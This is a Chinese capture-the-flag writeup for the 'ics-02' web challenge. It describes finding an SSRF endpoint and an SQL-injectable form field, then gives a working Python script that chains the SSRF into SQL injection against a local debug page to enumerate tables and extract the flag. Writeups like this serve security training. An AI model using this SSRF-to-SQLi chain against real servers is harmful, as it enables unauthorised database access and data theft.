继续ctf的旅程 开始攻防世界web高手进阶区的8分题 本文是ics-02的writeup
进来界面 点击paper,下载下来一个download.php 但是打不开 有点懵 。。。。。。 xxd 打开发现是一个 PDF 文件 打开后没发现有用信息,但大概是个提示要用ssrf 回去看眼paper的url是220.249.52.133:54086/download.php?dl=ssrf
回到原界面 惯例看看源码和御剑扫描下 发现/secret/目录
secret_debug.php提示IP没有权限 似乎与前面提示的ssrf呼应了呢 secret.php进来是个问卷 一定要全选第一项才会跳出下个界面 url是http://220.249.52.133:54086/secret/secret.php?s=2&rbCitizen=Y&rbAge=Y&rbResident=Y&rbFelony=rbFelony1&btnContinue=Continue 瞅着这个问卷 感觉会有sql注入漏洞啊 先随意填写 会返回 且url为http://220.249.52.133:54086/secret/secret.php?s=3&txtfirst_name=a&txtmiddle_name=b&txtLast_name=v&txtname_suffix=d&txtdob=11/11/1991&txtdl_nmbr=123456789&txtRetypeDL=987654321&btnContinue2=Continue
经过测试 发现name这里可以进行sql注入
那思路就是通过download.php用ssrf对secret_debug.php发起请求进行sql注入
脚本如下
import requests import random import urllib url = 'http://220.249.52.133:54086/download.php' # subquery = "database()" # ssrfw # subquery = "select table_name from information_schema.tables where table_schema='ssrfw' LIMIT 1" # cetcYssrf # subquery = "select column_name from information_schema.columns where table_name='cetcYssrf' LIMIT 1" # secretname -> flag # subquery = "select column_name from information_schema.columns where table_name='cetcYssrf' LIMIT 1, 1" # value -> flag{cpg9ssnu_OOOOe333eetc_2018} subquery = "select value from cetcYssrf LIMIT 1" id = random.randint(1, 10000000) d = ('http://127.0.0.1/secret/secret_debug.php?' + urllib.parse.urlencode({ "s": "3", "txtfirst_name": "L','1',("+subquery+"),'1'/*", "txtmiddle_name": "m", "txtLast_name": "y", "txtname_suffix": "Esq.", "txtdob": "*/,'01/10/2019", "txtdl_nmbr": id, "txtRetypeDL": id, "btnContinue2":"Continue" }) ) r = requests.get(url, params={"dl": d}) print(r.text)成功获取flag
中间卡了好一会儿 对ssrf不熟啊 之后要对ssrf做个归纳总结
知识点
ssrfsql注入